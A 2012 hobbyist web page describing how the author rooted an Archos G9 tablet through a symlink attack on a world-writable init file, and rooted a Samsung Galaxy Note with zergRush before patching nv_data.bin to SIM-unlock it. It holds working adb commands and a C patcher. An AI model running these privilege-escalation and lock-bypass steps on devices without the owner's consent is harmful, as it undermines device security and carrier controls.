Rooting android

Some rooting techniques I've used.

Archos G9

Rooting done 2012-04-12 on a G9 with firmware 3.2.69. Also done 2012-04-16 with firmware 4.0.5. (The technique seems to work for 4.0.6 and 4.0.7 too. Not tried but by reading init.rc from the AOS file it seems so...)

After reading Rosenberg's website (see the links below), I wondered if a symbolic link root method was possible on the G9. (There is already an exploit out there, coming from Paul O'Brien, but only binary and no details on how it works, so I didn't try it. No source, no trust.) I booted the G9, launched adb, and looked at /init.rc. I saw those lines:

    mkdir /data/misc/smb 0770 system system
    mkdir /data/test 0777 shell shell
    chown system system /data/misc/gps
    chown system system /data/misc/smb
    chmod 777 /data/misc/smb
    touch /data/misc/smb/fusesmb.conf
    chown system system /data/misc/smb/fusesmb.conf
    chmod 666 /data/misc/smb/fusesmb.conf

Bingo? Is /data/misc/smb/fusesmb.conf exploitable?

I removed it. No complain. File deleted. Okay. Let's reboot. File reappears? Yes! Let's remove it again, do a link to /data/local.prop, reboot one more time. Can I read/write /data/local.prop? Yes! Let's put ro.kernel.qemu=1 in there, reboot. Root shell? Root shell. Game over.

Here is the procedure, as run from my linux host. The G9 is in USB debug mode (dig in the settings) and, obviously, connected to the linux computer with an USB cable. You need adb (get the android SDK, it's in there somewhere).

    adb shell
    in the shell, type:
        rm /data/misc/smb/fusesmb.conf
        ln -s /data/local.prop /data/misc/smb/fusesmb.conf
    quit the shell (ctrl+c)
    reboot the G9, wait for it to come back
    adb shell
    in the shell, type:
        echo "ro.kernel.qemu=1" > /data/local.prop
    quit the shell
    reboot the G9
    adb shell
    you have a root shell

The G9 is in a weird state because of this ro.kernel.qemu (sound won't work with firmware 3.2.69 for example). So, when you are done being root, clean up.

    adb shell
    in the shell, type:
        rm /data/local.prop
        rm /data/misc/smb/fusesmb.conf
    quit the shell
    reboot the G9

On your linux computer, run adb kill-server when you are done, to clean up your linux computer.

Samsung Galaxy Note

Rooting done 2012-03-30 with android 2.3.6 (kernel version 2.6.35.7-N7000XXKKA-CL726566, build number GINGERBREAD.XXKKA). The phone was from SFR, bought beginning of 2012.

The goal was to sim-unlock the phone.

You need "adb" coming from the android SDK.

You need the program "zergRush", dig for it on the internet.

Become root:

  adb push zergRush /data/local
  adb shell
  in the shell, type:
    cd /data/local
    chmod 777 zergRush
    ./zergRush
  (wait for zergRush to give you root, a bit long, the adb shell will
  auto-exit when it's done)

Once you are root, you can sim-unlock.

Get the file to modify:

  adb pull /efs/nv_data.bin
  (dig in the file for the offset where is the 01 that will become 00 to
  sim-unlock the phone
  for me it is at 0x181469, I have that line from a
  "od -tx1 -Ax nv_data.bin | less" (you can type "/53 53" to search in 'less'
  or "/^180" to go to first line starting with "180"):
    180000 53 53 4e 56 7c 75 f3 e8 df fd 00 0d f1 b0 6d b1
  it's a start of block or something (the first 4 bytes read "SSNV", and then:
    181460 ff ff ff ff ff ff ff ff ff 01 00 00 00 00 ff 95
  see this 01 before the 00, that's what you're after)

Compile and run the following C program.

  #include <stdio.h>
  #include <stdlib.h>
  
  int main(void)
  {
    char c = 0;
    FILE *f = fopen("nv_data.bin", "r+");
    if (f == NULL) abort();
    fseek(f, 0x181469, SEEK_SET);
    fwrite(&c, 1, 1, f);
    fclose(f);
    return 0;
  }

You must modify the offset of fseek to match yours. Compile, run.

Once you ran, verify that the file has a 00 instead of 01 at the wanted offset.

Then, get the user and group of original nv_data.bin:

  adb shell ls -l /efs/nv_data.bin

It says "radio radio" for me.

Remove old nv_data.bin.

  adb shell rm /efs/nv_data.bin

Put new one:

  adb push nv_data.bin /efs/nv_data.bin

Remove md5 file:

  adb shell rm /efs/nv_data.bin.md5

Change owner of file (adapt, maybe it's not "radio.radio" for you):

  adb shell chown radio.radio /efs/nv_data.bin

Change permission too (maybe not necessary):

  adb shell chmod 666 /efs/nv_data.bin

Cleanup:

  adb shell rm /data/local/zergRush
  adb shell rm /data/local/tmp/boomsh
  adb shell rm /data/local/tmp/sh

Reboot phone:

  adb reboot

Check the locks. Dial: *#7465625# (don't forget the '*' and the two '#').

Links


Contact: sed@free.fr

Created: Fri, 13 Apr 2012 09:46:41 +0200
Last update: Mon, 25 Jun 2012 10:55:40 +0200